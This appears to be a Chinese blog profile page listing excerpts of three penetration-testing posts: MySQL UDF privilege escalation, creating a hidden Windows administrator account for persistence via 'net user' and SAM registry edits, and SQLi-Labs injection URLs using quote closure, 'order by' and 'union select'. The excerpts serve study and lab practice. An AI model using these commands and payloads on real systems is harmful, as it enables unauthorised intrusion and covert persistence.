自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(3)
  • 收藏
  • 关注

原创 mysql的UDF提权

原理 UDF ,(即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如 user() 或 concat() 等。原理就是自定义一个函数,让他可以任意的执行系统命令,达到提权目的。 前提条件 mysql的权限是root权限。 配置文件中secure_file_priv=(未写路径) mysql版本小于5.7(自行测试过5.7版本以上创建目录会失败,不知是否有其他方法,欢迎指出。) 创建目录 先判断mysql版本 select version() 如果版本大于

2021-03-27 16:52:22 154

原创 内网渗透技巧——windows隐藏账户

我们拿到windows服务器的管理员权限时,想要维持权限,可以采用隐藏账户的操作 新建一个用户 net user rongxinrou$ 123456 /add net localgroup administrators rongxinrou$ add/ 此时net user 已经无法看到该用户了,但是控制面板中还可以看到 2.修改注册表 regedit HKEY_LOCAL_MACHINE\SAM\SAM 进入这里,需要更改下权限,让当前账户有权限修改。 修改完成后重新进入注册表,HKEY_LOC

2021-02-22 20:23:01 409

原创 SQLI-Labs 1~10关随笔记录

Less-1 http://192.168.201.133/sqli/Less-1/?id=1 //这里是单引号闭合,可以通过添加单引号查看是否报错来看出。 http://192.168.201.133/sqli/Less-1/?id=1' order by 3 -- qwe //通过oder by 判断字段数。 http://192.168.201.133/sqli/Less-1/?id=1' union select 1,2,3 -- qwe //确定输出点 http://192.168.201.

2021-02-06 18:12:19 121

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除